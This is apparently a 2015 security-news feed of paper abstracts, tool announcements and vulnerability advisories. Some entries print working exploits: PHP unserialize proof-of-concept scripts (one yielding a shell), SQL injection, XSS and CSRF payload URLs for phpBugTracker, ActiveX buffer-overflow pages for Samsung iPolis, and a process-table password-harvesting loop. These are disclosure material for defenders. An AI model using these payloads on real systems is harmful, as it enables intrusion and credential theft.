Demonstrating ClickJacking with Jack

February 20, 2015, 5:28 am

≫ Next: Paper: Machine Learning Classification over Encrypted Data

≪ Previous: Superphish script to silently intercept SSL on computers infected with Superfish malware

Jack is a tool I created to help build Clickjacking PoC's. It uses basic HTML and Javascript and can be found on github - See more at: http://www.sensepost.com/blog/11105.html#sthash.OXRlSyNM.dpuf

↧

Paper: Machine Learning Classification over Encrypted Data

February 21, 2015, 1:35 am

≫ Next: Type Confusion Infoleak Vulnerability in unserialize() with DateTimeZone

≪ Previous: Demonstrating ClickJacking with Jack

Machine learning classification is used for numerous
tasks nowadays, such as medical or genomics predictions,
spam detection, face recognition, and financial predictions. Due
to privacy concerns, in some of these applications, it is important
that the data and the classifier remain confidential.

In this work, we construct three major classification protocols
that satisfy this privacy constraint: hyperplane decision, Naïve
Bayes, and decision trees. We also enable these protocols to be
combined with AdaBoost. At the basis of these constructions is
a new library of building blocks, which enables constructing a
wide range of privacy-preserving classifiers; we demonstrate how
this library can be used to construct other classifiers than the
three mentioned above, such as a multiplexer and a face detection
classifier.

We implemented and evaluated our library and our classifiers.
Our protocols are efficient, taking milliseconds to a few seconds
to perform a classification when running on real medical datasets.

more here.............http://www.internetsociety.org/sites/default/files/04_1_2.pdf

↧

Type Confusion Infoleak Vulnerability in unserialize() with DateTimeZone

February 21, 2015, 2:23 am

≫ Next: Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]

≪ Previous: Paper: Machine Learning Classification over Encrypted Data

#Type Confusion Infoleak Vulnerability in unserialize() with DateTimeZone

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date:
2015.1.29 - Release Date: 2015.2.20

> A Type Confusion Vulnerability was discovered in unserialize() with DateTimeZone object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.6
Affected is PHP 5.5 < 5.5.22
Affected is PHP 5.4 < 5.4.38

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
static int php_date_timezone_initialize_from_hash(zval **return_value,
php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)
{
zval **z_timezone = NULL;
zval **z_timezone_type = NULL;

if (zend_hash_find(myht, "timezone_type", 14, (void**)
&z_timezone_type) == SUCCESS) {
if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) {
convert_to_long(*z_timezone_type);
if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone)
TSRMLS_CC)) {
return SUCCESS;
}
}
}
return FAILURE;
}
...
static int timezone_initialize(php_timezone_obj *tzobj, /*const*/ char
*tz) /* {{{ */
{
timelib_time *dummy_t = ecalloc(1, sizeof(timelib_time));
int dst, not_found;
char *orig_tz = tz;

dummy_t->z = timelib_parse_zone(&tz, &dst, dummy_t, &not_found,
DATE_TIMEZONEDB, php_date_parse_tzfile_wrapper);
if (not_found) {
php_error_docref(NULL, E_WARNING, "Unknown or bad timezone (%s)", orig_tz);
```

The Z_STRVAL_PP macro lead to looking up an arbitrary valid memory
address, and outputing a string via an warning level error message
that start from this memory address.

Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.

```
<?php

$data = unserialize('O:12:"DateTimeZone":2:{s:13:"timezone_type";i:1;s:8:"timezone";i:4298494896;}');

?>
```

Test the PoC on the command line, then show warning level error message:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run test/test.php
Process 889 launched: '/usr/bin/php' (x86_64)

Warning: DateTimeZone::__wakeup(): Unknown or bad timezone
(UH??AWAVAUATSH??8) in /test/test.php on line 3
Process 889 exited with status = 0 (0x00000000)
```

↧

Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]

February 21, 2015, 2:24 am

≫ Next: Komodia rootkit findings by @TheWack0lian

≪ Previous: Type Confusion Infoleak Vulnerability in unserialize() with DateTimeZone

#Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date:
2015.1.29 - Release Date: 2015.2.20

> A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.6
Affected is PHP 5.5 < 5.5.22
Affected is PHP 5.4 < 5.4.38

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
static int php_date_initialize_from_hash(php_date_obj **dateobj,
HashTable *myht)
{
zval *z_date;
zval *z_timezone;
zval *z_timezone_type;
zval tmp_obj;
timelib_tzinfo *tzi;
php_timezone_obj *tzobj;

z_date = zend_hash_str_find(myht, "date", sizeof("data")-1);
if (z_date) {
convert_to_string(z_date);
z_timezone_type = zend_hash_str_find(myht, "timezone_type",
sizeof("timezone_type")-1);
if (z_timezone_type) {
convert_to_long(z_timezone_type);
z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1);
if (z_timezone) {
convert_to_string(z_timezone);

...

static int php_date_timezone_initialize_from_hash(zval **return_value,
php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)
{
zval **z_timezone = NULL;
zval **z_timezone_type = NULL;

if (zend_hash_find(myht, "timezone_type", 14, (void**)
&z_timezone_type) == SUCCESS) {
if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) {
convert_to_long(*z_timezone_type);
if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone)
TSRMLS_CC)) {
return SUCCESS;
}
}
}
return FAILURE;
}
```

The convert_to_long() leads to the ZVAL and all its children is freed
from memory. However the unserialize() code will still allow to use R:
or r: to set references to that already freed memory. There is a use
after free vulnerability, and allows to execute arbitrary code.

Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.

```
<?php

$f = $argv[1];
$c = $argv[2];

$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";

$data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';

$x = unserialize($data1);
$y = $x[2];

// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";

$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\x00\x00\x00\x00";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";

$data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}';

$z = unserialize($data2);

function ptr2str($ptr)
{
$out = "";
for ($i=0; $i<8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}

?>
```

Test the PoC on the command line, then any PHP code can be executed:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run uafpoc.php assert "system$'sh'$==exit"
Process 13472 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 13472 exited with status = 0 (0x00000000)
(lldb)
```

↧

Komodia rootkit findings by @TheWack0lian

February 21, 2015, 2:34 am

≫ Next: Multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities in phpBugTracker v. 1.6.0

≪ Previous: Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]

First off: this is the first time I "seriously" reversed a kernel-mode NT driver, so keep that in mind when you read this here.........https://gist.github.com/Wack0/f865ef369eb8c23ee028

and more on Komodia here.........https://blog.filippo.io/komodia-superfish-ssl-validation-is-broken/

↧

Multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities in phpBugTracker v. 1.6.0

February 21, 2015, 2:27 am

≫ Next: Multiple stored XSS-vulnerabilities in MyBB v. 1.8.3

≪ Previous: Komodia rootkit findings by @TheWack0lian

Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in
phpBugTracker v.1.6.0
Advisory ID: SROEADV-2015-16
Author: Steffen Rösemann
Affected Software: phpBugTracker v.1.6.0
Vendor URL: https://github.com/a-v-k/phpBugTracker
Vendor Status: patched
CVE-ID: will asked to be assigned after release on FullDisclosure via
OSS-list
Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31

==========================
Vulnerability Description:
==========================

The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-,
stored/reflected XSS- and CSRF-vulnerabilities.

==================
Technical Details:
==================

The following files used in a common phpBugTracker installation suffer from
different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:

===========
project.php
===========

SQL injection / underlaying CSRF vulnerability in project.php via id
parameter:

http://
{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+

Stored XSS via input field "project name":

http://{TARGET}/admin/project.php?op=add

executed in: e.g. http://{TARGET}/admin/project.php, http://
{TARGET}/index.php

========
user.php
========

Reflecting XSS in user.php via use_js parameter:

http://
{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1

executed in: same page

=========
group.php
=========

Reflecting XSS in group.php via use_js parameter:

http://
{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1

executed in: same page

(Blind) SQL Injection / underlaying CSRF vulnerability in group.php via
group_id parameter (used in different operations):

http://
{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http://
{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+

==========
status.php
==========

SQL injection / underlaying CSRF vulnerability in status.php via status_id
parameter:

http://
{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

Stored XSS via input field "Description":

http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0

executed in: e.g. http://{TARGET}/admin/status.php

CSRF vulnerability in status.php (delete statuses):

<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}"
>

==============
resolution.php
==============

SQL injection / underlaying CSRF vulnerability in resolution.php via
resolution_id parameter:

http://
{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in resolution.php (delete resolutions):

<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}"
>

============
severity.php
============

SQL injection / underlaying CSRF vulnerability in severity.php via
severity_id parameter:

http://
{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

CSRF vulnerability in severity.php (delete severities):

<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}"
>

Stored XSS in severity.php via input field "Description":

http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0

executed in: e.g. http://{TARGET}/admin/severity.php

============
priority.php
============

SQL injection / underlaying CSRF vulnerability in priority.php via
priority_id parameter:

http://
{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+

======
os.php
======

SQL Injection / underlaying CSRF vulnerability in os.php via os_id
parameter:

http://
{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in os.php (delete operating systems):

<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >

Stored XSS vulnerability in os.php via input field "Regex":

http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0

executed in: e.g. http://{TARGET}/admin/os.php?

============
database.php
============

SQL injection / underlaying CSRF vulnerability in database.php via
database_id:

http://
{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+

CSRF vulnerability in database.php (delete databases):

<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}"
>

Stored XSS vulnerability in database.php via input field "Name":

http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0

========
site.php
========

CSRF vulnerability in site.php (delete sites):

<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >

SQL injection / underlaying CSRF vulnerability in site.php via site_id
parameter:

http://
{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+

=======
bug.php
=======

This issue has already been assigned CVE-2004-1519, but seems to have not
been corrected since the assignment:

SQL injection / underlaying CSRF vulnerability in bug.php via project
parameter:

http://
{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+

For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.

=========
Solution:
=========

Update to version 1.7.0.

====================
Disclosure Timeline:
====================
03/05-Feb-2015 – found the vulnerabilities
05-Feb-2015 - informed the developers (see [3])
05-Feb-2015 – release date of this security advisory [without technical
details]
05-Feb-2015 - forked the Github repository, to keep it available for other
security researchers (see [4])
05/06-Feb-2015 - vendor replied, will provide a patch for the
vulnerabilities
09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical
details will be released on 19th February 2015
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - send to FullDisclosure

========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] https://github.com/a-v-k/phpBugTracker
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
[3] https://github.com/a-v-k/phpBugTracker/issues/4
[4] https://github.com/sroesemann/phpBugTracker

↧

Multiple stored XSS-vulnerabilities in MyBB v. 1.8.3

February 21, 2015, 2:28 am

≫ Next: Samsung iPolis XnsSdkDeviceIpInstaller.ocx ActiveX Remote Code Execution Vulnerabilities

≪ Previous: Multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities in phpBugTracker v. 1.6.0

Advisory: Stored XSS-Vulnerabilities in MyBB v. 1.8.3
Advisory ID: SROEADV-2015-15
Author: Steffen Rösemann
Affected Software: MyBB v. 1.8.3
Vendor URL: http://www.mybb.com
Vendor Status: patched
CVE-ID: -

==========================
Vulnerability Description:
==========================

MyBB v. 1.8.3 suffers from multiple stored XSS-vulnerabilities in the
administrative backend.

==================
Technical Details:
==================

The stored XSS-vulnerabilities can be found in different modules in the
following locations of a common MyBB installation:

======================
Module "config-attachment_types"
======================

via form-field MIME-type:

http://{TARGET}/admin/index.php?module=config-attachment_types&action=add

executed in: e.g. http://
{TARGET}/admin/index.php?module=config-attachment_types

===============
Module "config-mycode"
===============

via form fields "title" and "short description":

http://{TARGET}/admin/index.php?module=config-mycode&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=config-mycode

===================
Module "forum-management"
===================

via form field "title":

http://{TARGET}/admin/index.php?module=forum-management&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=forum

==============
Module "user-groups"
==============

via form fields "title" and/or "short description":

http://{TARGET}/admin/index.php?module=user-groups&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=user-groups

================
Module "style-templates"
================

via form field "name":

http://{TARGET}/admin/index.php?module=style-templates&action=add_set

executed in: e.g. http://{TARGET}/admin/index.php?module=style-templates

====================================
Module "style-templates" in action "add_template_group"
====================================

via form field "title":

http://
{TARGET}/admin/index.php?module=style-templates&action=add_template_group

executed in: e.g. http://
{TARGET}/admin/index.php?module=style-templates&sid={TEMPLATES_NUMERIC_ID}

=============
Module "tool-tasks"
=============

via form field "title":

http://{TARGET}/admin/index.php?module=tools-tasks&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

=================
Module "config-post_icons"
=================

via form field "name":

http://{TARGET}/admin/index.php?module=config-post_icons&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

=============
Module "user-titles"
=============

via form field "title to assign":

http://{TARGET}/admin/index.php?module=user-titles&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

================
Module "config-banning"
================

via form field "username":

http://{TARGET}/admin/index.php?module=config-banning&type=usernames

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

=========
Solution:
=========

Upgrade to v. 1.8.4.

====================
Disclosure Timeline:
====================
02/03-Feb-2015 – found the vulnerabilities
03-Feb-2015 - informed the developers according to their security issue
rules (see [3])
03-Feb-2015 – release date of this security advisory [without technical
details]
03-Feb-2015 - vendor replied, issues will be patched
15-Feb-2015 - vendor released patch v. 1.8.4 (see [4])
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - send to FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://www.mybb.com
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-15.html
[3] http://www.mybb.com/get-involved/security/
[4]
http://blog.mybb.com/2015/02/15/mybb-1-8-4-released-feature-update-security-maintenance-release/

↧

Samsung iPolis XnsSdkDeviceIpInstaller.ocx ActiveX Remote Code Execution Vulnerabilities

February 21, 2015, 2:41 am

≫ Next: x86obf code virtualizer released for free

≪ Previous: Multiple stored XSS-vulnerabilities in MyBB v. 1.8.3

CVE-2015-0555

Introduction
*************************************************************

There is a Buffer Overflow Vulnerability which leads to Remote Code
Execution.
Vulnerability is due to input validation to the API ReadConfigValue and
WriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx

This is different from CVE-2014-3911 as the version of iPolis 1.12.2
(latest as of 12/12/2014).
CVE-2014-3911 is related to different ActiveX and on older iPolis version

Discovery MEthod: Fuzzing
Exploiting: It is a client side attack where attacker can host a crafted
HTML web page with malicious payload and entice the victim to browse to the
hosted page to compromise the victim.

Operating System: Windows 7 Ultimate N SP1

*************************************************************
Vulnerability1:
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution*
******************Proof of Concept (PoC)**************8
</html>
<head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue()
Remote Code Execution</head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\Samsung\iPOLiS Device
Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName = "ReadConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
argCount = 1

arg1=String(1044, "A")

target.ReadConfigValue arg1

</script>
</html>

*****************************************************************************************
*Vulnerability2: *
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution
*

*******************Proof of Concept (PoC)*********************

<html>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\Samsung\iPOLiS Device
Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal
szValue As String ) As Long"
memberName = "WriteConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
argCount = 2

arg1=String(14356, "A")
arg2="defaultV"

target.WriteConfigValue arg1 ,arg2

</script></job></package>
</html>
****************************************************************************

CERT contacted Samsung but there wasn't any response from Samsung.
Refer http://blog.disects.com for more details

Authored by
Praveen Darshanam

↧

x86obf code virtualizer released for free

February 21, 2015, 2:46 am

≫ Next: Exploiting the Superfish certificate

≪ Previous: Samsung iPolis XnsSdkDeviceIpInstaller.ocx ActiveX Remote Code Execution Vulnerabilities

x86obf is a tool for executable binary protection. It works by locating marked code blocks of code and converting them to a series of instructions understood only by a randomly generated virtual machine in order to make reverse engineering harder.

more here.......http://chaplja.blogspot.com/2015/02/x86obf-code-virtualizer-released-for.html

↧

Exploiting the Superfish certificate

February 21, 2015, 6:37 am

≫ Next: It All Swings Round-- Malicious Macros

≪ Previous: x86obf code virtualizer released for free

As discussed in my previous blogpost, it took about 3 hours to reverse engineer the Lenovo/Superfish certificate and crack the password. In this blog post, I described how I used that certificate in order to pwn victims using a rogue WiFi hotspot. This took me also about three hours.

more here..........http://blog.erratasec.com/2015/02/exploiting-superfish-certificate.html#.VOiYBfnF-So

↧

It All Swings Round-- Malicious Macros

February 21, 2015, 10:40 am

≫ Next: Paper: PowerSpy: Location Tracking using Mobile Device Power Analysis

≪ Previous: Exploiting the Superfish certificate

I was recently intrigued by a TrendMicro blog talking about VAWTRAK malware. Baddies are going way back to using some old-school methods of infection. Heck, I used a malicious macro embedded in a Word Document on a social engineering engagement back at my first job.

So I wanted to look at some of these new macros and see what they are doing (and how they are doing it).

more here............http://sketchymoose.blogspot.com/2015/02/it-all-swings-round-malicious-macros.html

↧

Paper: PowerSpy: Location Tracking using Mobile Device Power Analysis

February 21, 2015, 12:28 pm

≫ Next: Bowcaster Feature: multipart/form-data

≪ Previous: It All Swings Round-- Malicious Macros

Abstract—Modern mobile platforms like Android enable applications
to read aggregate power usage on the phone. This
information is considered harmless and reading it requires no
user permission or notification. We show that by simply reading
the phone’s aggregate power consumption over a period of a few
minutes an application can learn information about the user’s
location. Aggregate phone power consumption data is extremely
noisy due to the multitude of components and applications
simultaneously consuming power. Nevertheless, we show that by
using machine learning techniques, the phone’s location can be
inferred. We discuss several ways in which this privacy leak can
be remedied.

more here........http://arxiv.org/pdf/1502.03182v1.pdf

↧

Bowcaster Feature: multipart/form-data

February 21, 2015, 12:30 pm

≫ Next: xaviershay-dm-rails v0.10.3.8 mysql credential exposure

≪ Previous: Paper: PowerSpy: Location Tracking using Mobile Device Power Analysis

Need to reverse engineer or exploit a file upload vulnerability in an embedded web server? I added a multipart/form-data class to Bowcaster to help with that.

more here...........http://shadow-file.blogspot.com/2015/02/bowcaster-feature-multipartform-data.html

↧

xaviershay-dm-rails v0.10.3.8 mysql credential exposure

February 21, 2015, 3:59 pm

≫ Next: Paper: Evaluation of Security Solutions for Android Systems

≪ Previous: Bowcaster Feature: multipart/form-data

Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2015-02-17
Download Site: https://rubygems.org/gems/xaviershay-dm-rails
Vendor: Martin Gamsjaeger, Dan Kubb
Vendor Notified: 2015-02-17
Vendor Contact: notreal [at] rhnh.net
Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically.
Vulnerability:
The problem is with the execute function exposing the user credentials to the process table.

Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb:

def execute(statement)
system(
'mysql',
(username.blank? ? '' : "--user=#{username}"),
(password.blank? ? '' : "--password=#{password}"),
'-e',
statement
)
end

OSVDB:118579
Exploit Code:
• $ while (true) do ps -ef |grep [p]assword; done
Advisory: http://www.vapid.dhs.org/advisory.php?v=115

↧

Paper: Evaluation of Security Solutions for Android Systems

February 22, 2015, 2:06 am

≫ Next: Automating DFIR (Digital Forensics and Incident Response) - How to series on programming libtsk with python Part 1, 2 and 3

≪ Previous: xaviershay-dm-rails v0.10.3.8 mysql credential exposure

With the increasing usage of smartphones a plethora of security
solutions are being designed and developed. Many of the security
solutions fail to cope with advanced attacks and are not aways
properly designed for smartphone platforms. Therefore, there is a
need for a methodology to evaluate their effectiveness. Since the
Android operating system has the highest market share today, we
decided to focus on it in this study in which we review some of
the state-of-the-art security solutions for Android-based
smartphones. In addition, we present a set of evaluation criteria
aiming at evaluating security mechanisms that are specifically
designed for Android-based smartphones. We believe that the
proposed framework will help security solution designers develop
more effective solutions and assist security experts evaluate the
effectiveness of security solutions for Android-based
smartphones.

more here...........http://arxiv.org/ftp/arxiv/papers/1502/1502.04870.pdf

↧

Automating DFIR (Digital Forensics and Incident Response) - How to series on programming libtsk with python Part 1, 2 and 3

February 22, 2015, 3:37 am

≫ Next: Paper: Bitcoin over Tor isn’t a good idea

≪ Previous: Paper: Evaluation of Security Solutions for Android Systems

As you can see from the title of this post I'm starting on a series all about automating your work flow when doing DFIR work. It is my belief that our industry as we know it is poised for change due to the work of a few, but mostly in my opinion Joachim Metz. For all the time that I've done DFIR work the biggest lock in that commercial software had that everyone else did not was the ability to work directly against a forensic image. We would always have to resort to using some commercial tool (whether free, semi free or paid for) to get access to the underlying data within a forensic image or a live running system to get at the data we wanted to. With the large set of free and open source libraries now available you can write simple code to automate most of the work you were doing within these forensic tools and have the ability to customize that to your actual need.

more here of part 1......http://hackingexposedcomputerforensicsblog.blogspot.com/2015/02/automating-dfir-how-to-series-on.html

part 2.......http://hackingexposedcomputerforensicsblog.blogspot.com/2015/02/automating-dfir-how-to-series-on_19.html

part 3......http://hackingexposedcomputerforensicsblog.blogspot.com/2015/02/automating-dfir-how-to-series-on_21.html

↧

Paper: Bitcoin over Tor isn’t a good idea

February 22, 2015, 3:41 am

≫ Next: proxenet

≪ Previous: Automating DFIR (Digital Forensics and Incident Response) - How to series on programming libtsk with python Part 1, 2 and 3

Abstract—Bitcoin is a decentralized P2P digital currency
in which coins are generated by a distributed set of miners
and transaction are broadcasted via a peer-to-peer network.
While Bitcoin provides some level of anonymity (or rather
pseudonymity) by encouraging the users to have any number
of random-looking Bitcoin addresses, recent research shows that
this level of anonymity is rather low. This encourages users to
connect to the Bitcoin network through anonymizers like Tor and
motivates development of default Tor functionality for popular
mobile SPV clients. In this paper we show that combining Tor and
Bitcoin creates an attack vector for the deterministic and stealthy
man-in-the-middle attacks. A low-resource attacker can gain full
control of information flows between all users who chose to use
Bitcoin over Tor. In particular the attacker can link together
user’s transactions regardless of pseudonyms used, control which
Bitcoin blocks and transactions are relayed to the user and can
delay or discard user’s transactions and blocks. In collusion with
a powerful miner double-spending attacks become possible and
a totally virtual Bitcoin reality can be created for such set of
users. Moreover, we show how an attacker can fingerprint users
and then recognize them and learn their IP address when they
decide to connect to the Bitcoin network directly.

more here.............http://arxiv.org/pdf/1410.6079v2.pdf

↧

proxenet

February 22, 2015, 4:06 am

≫ Next: universal copy/paste in linux

≪ Previous: Paper: Bitcoin over Tor isn’t a good idea

proxenet is a Write-Your-Own-Plugins multi-threaded web proxy for pentesters designed to allow you to use your favorite scripting language (Python, Lua, Ruby, etc.) to perform targeted attacks on HTTP applications.

more here...........https://github.com/hugsy/proxenet

↧

universal copy/paste in linux

February 22, 2015, 8:00 am

≫ Next: Hex-Rays Decompiler Enhanced View (HRDEV)

≪ Previous: proxenet

I’d like to use the same copy/paste keyboard bindings in every application on linux. I spent some time determining if such is possible (spoiler, at best it’s hacky).

more here..........http://burrows.svbtle.com/universal-copy-paste-in-linux

↧

Hex-Rays Decompiler Enhanced View (HRDEV)

February 22, 2015, 3:57 pm

≫ Next: Apple OS X: Don't trust, and don't prompt to trust certificates

≪ Previous: universal copy/paste in linux

This is a simple IDA Pro Python plugin to make Hex-Rays Decompiler output bit more attractive. HRDEV plugin retrieves standard decompiler output, parses it with Python Clang bindings, does some magic, and puts back.

more here.......https://github.com/ax330d/hrdev

↧